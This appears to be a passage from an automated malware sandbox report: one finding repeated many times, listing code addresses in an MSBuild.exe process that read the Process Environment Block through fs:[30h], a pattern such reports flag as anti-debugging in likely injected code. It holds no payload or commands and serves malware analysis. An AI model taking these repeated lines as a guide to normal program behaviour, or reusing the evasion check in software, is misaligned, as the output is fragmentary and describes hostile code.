Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013A51EF mov eax, dword ptr fs:[00000030h] 5_2_013A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013A51EF mov eax, dword ptr fs:[00000030h] 5_2_013A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013A51EF mov eax, dword ptr fs:[00000030h] 5_2_013A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013A51EF mov eax, dword ptr fs:[00000030h] 5_2_013A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013A51EF mov eax, dword ptr fs:[00000030h] 5_2_013A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013A51EF mov eax, dword ptr fs:[00000030h] 5_2_013A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013A51EF mov eax, dword ptr fs:[00000030h] 5_2_013A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013851ED mov eax, dword ptr fs:[00000030h] 5_2_013851ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0140019F mov eax, dword ptr fs:[00000030h] 5_2_0140019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0140019F mov eax, dword ptr fs:[00000030h] 5_2_0140019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0140019F mov eax, dword ptr fs:[00000030h] 5_2_0140019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0140019F mov eax, dword ptr fs:[00000030h] 5_2_0140019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014311A4 mov eax, dword ptr fs:[00000030h] 5_2_014311A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014311A4 mov eax, dword ptr fs:[00000030h] 5_2_014311A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014311A4 mov eax, dword ptr fs:[00000030h] 5_2_014311A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014311A4 mov eax, dword ptr fs:[00000030h] 5_2_014311A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013BD1D0 mov eax, dword ptr fs:[00000030h] 5_2_013BD1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013BD1D0 mov ecx, dword ptr fs:[00000030h] 5_2_013BD1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013FE1D0 mov eax, dword ptr fs:[00000030h] 5_2_013FE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013FE1D0 mov eax, dword ptr fs:[00000030h] 5_2_013FE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013FE1D0 mov ecx, dword ptr fs:[00000030h] 5_2_013FE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013FE1D0 mov eax, dword ptr fs:[00000030h] 5_2_013FE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013FE1D0 mov eax, dword ptr fs:[00000030h] 5_2_013FE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01406050 mov eax, dword ptr fs:[00000030h] 5_2_01406050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137A020 mov eax, dword ptr fs:[00000030h] 5_2_0137A020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137C020 mov eax, dword ptr fs:[00000030h] 5_2_0137C020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0142705E mov ebx, dword ptr fs:[00000030h] 5_2_0142705E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0142705E mov eax, dword ptr fs:[00000030h] 5_2_0142705E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01455060 mov eax, dword ptr fs:[00000030h] 5_2_01455060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0140106E mov eax, dword ptr fs:[00000030h] 5_2_0140106E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0139E016 mov eax, dword ptr fs:[00000030h] 5_2_0139E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0139E016 mov eax, dword ptr fs:[00000030h] 5_2_0139E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0139E016 mov eax, dword ptr fs:[00000030h] 5_2_0139E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0139E016 mov eax, dword ptr fs:[00000030h] 5_2_0139E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01404000 mov ecx, dword ptr fs:[00000030h] 5_2_01404000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01391070 mov eax, dword ptr fs:[00000030h] 5_2_01391070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01391070 mov ecx, dword ptr fs:[00000030h] 5_2_01391070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01391070 mov eax, dword ptr fs:[00000030h] 5_2_01391070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01391070 mov eax, dword ptr fs:[00000030h] 5_2_01391070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01391070 mov eax, dword ptr fs:[00000030h] 5_2_01391070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01391070 mov eax, dword ptr fs:[00000030h] 5_2_01391070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01391070 mov eax, dword ptr fs:[00000030h] 5_2_01391070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01391070 mov eax, dword ptr fs:[00000030h] 5_2_01391070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01391070 mov eax, dword ptr fs:[00000030h] 5_2_01391070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01391070 mov eax, dword ptr fs:[00000030h] 5_2_01391070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01391070 mov eax, dword ptr fs:[00000030h] 5_2_01391070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01391070 mov eax, dword ptr fs:[00000030h] 5_2_01391070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01391070 mov eax, dword ptr fs:[00000030h] 5_2_01391070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013AC073 mov eax, dword ptr fs:[00000030h] 5_2_013AC073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013FD070 mov ecx, dword ptr fs:[00000030h] 5_2_013FD070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01382050 mov eax, dword ptr fs:[00000030h] 5_2_01382050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013AB052 mov eax, dword ptr fs:[00000030h] 5_2_013AB052
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0144903E mov eax, dword ptr fs:[00000030h] 5_2_0144903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0144903E mov eax, dword ptr fs:[00000030h] 5_2_0144903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0144903E mov eax, dword ptr fs:[00000030h] 5_2_0144903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0144903E mov eax, dword ptr fs:[00000030h] 5_2_0144903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014550D9 mov eax, dword ptr fs:[00000030h] 5_2_014550D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014020DE mov eax, dword ptr fs:[00000030h] 5_2_014020DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014060E0 mov eax, dword ptr fs:[00000030h] 5_2_014060E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013B909C mov eax, dword ptr fs:[00000030h] 5_2_013B909C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013AD090 mov eax, dword ptr fs:[00000030h] 5_2_013AD090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013AD090 mov eax, dword ptr fs:[00000030h] 5_2_013AD090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01385096 mov eax, dword ptr fs:[00000030h] 5_2_01385096
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0138208A mov eax, dword ptr fs:[00000030h] 5_2_0138208A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137D08D mov eax, dword ptr fs:[00000030h] 5_2_0137D08D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137C0F0 mov eax, dword ptr fs:[00000030h] 5_2_0137C0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013C20F0 mov ecx, dword ptr fs:[00000030h] 5_2_013C20F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013880E9 mov eax, dword ptr fs:[00000030h] 5_2_013880E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137A0E3 mov ecx, dword ptr fs:[00000030h] 5_2_0137A0E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013A50E4 mov eax, dword ptr fs:[00000030h] 5_2_013A50E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013A50E4 mov ecx, dword ptr fs:[00000030h] 5_2_013A50E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013A90DB mov eax, dword ptr fs:[00000030h] 5_2_013A90DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013970C0 mov eax, dword ptr fs:[00000030h] 5_2_013970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013970C0 mov ecx, dword ptr fs:[00000030h] 5_2_013970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013970C0 mov ecx, dword ptr fs:[00000030h] 5_2_013970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013970C0 mov eax, dword ptr fs:[00000030h] 5_2_013970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013970C0 mov ecx, dword ptr fs:[00000030h] 5_2_013970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013970C0 mov ecx, dword ptr fs:[00000030h] 5_2_013970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013970C0 mov eax, dword ptr fs:[00000030h] 5_2_013970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013970C0 mov eax, dword ptr fs:[00000030h] 5_2_013970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013970C0 mov eax, dword ptr fs:[00000030h] 5_2_013970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013970C0 mov eax, dword ptr fs:[00000030h] 5_2_013970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013970C0 mov eax, dword ptr fs:[00000030h] 5_2_013970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013970C0 mov eax, dword ptr fs:[00000030h] 5_2_013970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013970C0 mov eax, dword ptr fs:[00000030h] 5_2_013970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013970C0 mov eax, dword ptr fs:[00000030h] 5_2_013970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013970C0 mov eax, dword ptr fs:[00000030h] 5_2_013970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013970C0 mov eax, dword ptr fs:[00000030h] 5_2_013970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013970C0 mov eax, dword ptr fs:[00000030h] 5_2_013970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013970C0 mov eax, dword ptr fs:[00000030h] 5_2_013970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014460B8 mov eax, dword ptr fs:[00000030h] 5_2_014460B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014460B8 mov ecx, dword ptr fs:[00000030h] 5_2_014460B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013FD0C0 mov eax, dword ptr fs:[00000030h] 5_2_013FD0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013FD0C0 mov eax, dword ptr fs:[00000030h] 5_2_013FD0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01455341 mov eax, dword ptr fs:[00000030h] 5_2_01455341
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01377330 mov eax, dword ptr fs:[00000030h] 5_2_01377330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01402349 mov eax, dword ptr fs:[00000030h] 5_2_01402349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01402349 mov eax, dword ptr fs:[00000030h] 5_2_01402349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01402349 mov eax, dword ptr fs:[00000030h] 5_2_01402349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01402349 mov eax, dword ptr fs:[00000030h] 5_2_01402349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01402349 mov eax, dword ptr fs:[00000030h] 5_2_01402349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01402349 mov eax, dword ptr fs:[00000030h] 5_2_01402349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01402349 mov eax, dword ptr fs:[00000030h] 5_2_01402349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01402349 mov eax, dword ptr fs:[00000030h] 5_2_01402349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01402349 mov eax, dword ptr fs:[00000030h] 5_2_01402349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01402349 mov eax, dword ptr fs:[00000030h] 5_2_01402349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01402349 mov eax, dword ptr fs:[00000030h] 5_2_01402349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01402349 mov eax, dword ptr fs:[00000030h] 5_2_01402349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01402349 mov eax, dword ptr fs:[00000030h] 5_2_01402349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01402349 mov eax, dword ptr fs:[00000030h] 5_2_01402349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01402349 mov eax, dword ptr fs:[00000030h] 5_2_01402349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013AF32A mov eax, dword ptr fs:[00000030h] 5_2_013AF32A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0144A352 mov eax, dword ptr fs:[00000030h] 5_2_0144A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0140035C mov eax, dword ptr fs:[00000030h] 5_2_0140035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0140035C mov eax, dword ptr fs:[00000030h] 5_2_0140035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0140035C mov eax, dword ptr fs:[00000030h] 5_2_0140035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0140035C mov ecx, dword ptr fs:[00000030h] 5_2_0140035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0140035C mov eax, dword ptr fs:[00000030h] 5_2_0140035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0140035C mov eax, dword ptr fs:[00000030h] 5_2_0140035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0143F367 mov eax, dword ptr fs:[00000030h] 5_2_0143F367
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137C310 mov ecx, dword ptr fs:[00000030h] 5_2_0137C310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013A0310 mov ecx, dword ptr fs:[00000030h] 5_2_013A0310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013BA30B mov eax, dword ptr fs:[00000030h] 5_2_013BA30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013BA30B mov eax, dword ptr fs:[00000030h] 5_2_013BA30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013BA30B mov eax, dword ptr fs:[00000030h] 5_2_013BA30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0142437C mov eax, dword ptr fs:[00000030h] 5_2_0142437C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01387370 mov eax, dword ptr fs:[00000030h] 5_2_01387370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01387370 mov eax, dword ptr fs:[00000030h] 5_2_01387370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01387370 mov eax, dword ptr fs:[00000030h] 5_2_01387370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0140930B mov eax, dword ptr fs:[00000030h] 5_2_0140930B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0140930B mov eax, dword ptr fs:[00000030h] 5_2_0140930B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0140930B mov eax, dword ptr fs:[00000030h] 5_2_0140930B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01379353 mov eax, dword ptr fs:[00000030h] 5_2_01379353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01379353 mov eax, dword ptr fs:[00000030h] 5_2_01379353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0144132D mov eax, dword ptr fs:[00000030h] 5_2_0144132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0144132D mov eax, dword ptr fs:[00000030h] 5_2_0144132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137D34C mov eax, dword ptr fs:[00000030h] 5_2_0137D34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137D34C mov eax, dword ptr fs:[00000030h] 5_2_0137D34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014063C0 mov eax, dword ptr fs:[00000030h] 5_2_014063C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0143C3CD mov eax, dword ptr fs:[00000030h] 5_2_0143C3CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0143B3D0 mov ecx, dword ptr fs:[00000030h] 5_2_0143B3D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013B33A0 mov eax, dword ptr fs:[00000030h] 5_2_013B33A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013B33A0 mov eax, dword ptr fs:[00000030h] 5_2_013B33A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013A33A5 mov eax, dword ptr fs:[00000030h] 5_2_013A33A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01378397 mov eax, dword ptr fs:[00000030h] 5_2_01378397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01378397 mov eax, dword ptr fs:[00000030h] 5_2_01378397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01378397 mov eax, dword ptr fs:[00000030h] 5_2_01378397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0143F3E6 mov eax, dword ptr fs:[00000030h] 5_2_0143F3E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013D739A mov eax, dword ptr fs:[00000030h] 5_2_013D739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013D739A mov eax, dword ptr fs:[00000030h] 5_2_013D739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013A438F mov eax, dword ptr fs:[00000030h] 5_2_013A438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013A438F mov eax, dword ptr fs:[00000030h] 5_2_013A438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014553FC mov eax, dword ptr fs:[00000030h] 5_2_014553FC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137E388 mov eax, dword ptr fs:[00000030h] 5_2_0137E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137E388 mov eax, dword ptr fs:[00000030h] 5_2_0137E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137E388 mov eax, dword ptr fs:[00000030h] 5_2_0137E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013B63FF mov eax, dword ptr fs:[00000030h] 5_2_013B63FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0139E3F0 mov eax, dword ptr fs:[00000030h] 5_2_0139E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0139E3F0 mov eax, dword ptr fs:[00000030h] 5_2_0139E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0139E3F0 mov eax, dword ptr fs:[00000030h] 5_2_0139E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013903E9 mov eax, dword ptr fs:[00000030h] 5_2_013903E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013903E9 mov eax, dword ptr fs:[00000030h] 5_2_013903E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013903E9 mov eax, dword ptr fs:[00000030h] 5_2_013903E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013903E9 mov eax, dword ptr fs:[00000030h] 5_2_013903E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013903E9 mov eax, dword ptr fs:[00000030h] 5_2_013903E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013903E9 mov eax, dword ptr fs:[00000030h] 5_2_013903E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013903E9 mov eax, dword ptr fs:[00000030h] 5_2_013903E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013903E9 mov eax, dword ptr fs:[00000030h] 5_2_013903E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0145539D mov eax, dword ptr fs:[00000030h] 5_2_0145539D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0138A3C0 mov eax, dword ptr fs:[00000030h] 5_2_0138A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0138A3C0 mov eax, dword ptr fs:[00000030h] 5_2_0138A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0138A3C0 mov eax, dword ptr fs:[00000030h] 5_2_0138A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0138A3C0 mov eax, dword ptr fs:[00000030h] 5_2_0138A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0138A3C0 mov eax, dword ptr fs:[00000030h] 5_2_0138A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0138A3C0 mov eax, dword ptr fs:[00000030h] 5_2_0138A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013883C0 mov eax, dword ptr fs:[00000030h] 5_2_013883C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013883C0 mov eax, dword ptr fs:[00000030h] 5_2_013883C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013883C0 mov eax, dword ptr fs:[00000030h] 5_2_013883C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013883C0 mov eax, dword ptr fs:[00000030h] 5_2_013883C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137823B mov eax, dword ptr fs:[00000030h] 5_2_0137823B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0143B256 mov eax, dword ptr fs:[00000030h] 5_2_0143B256
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0143B256 mov eax, dword ptr fs:[00000030h] 5_2_0143B256
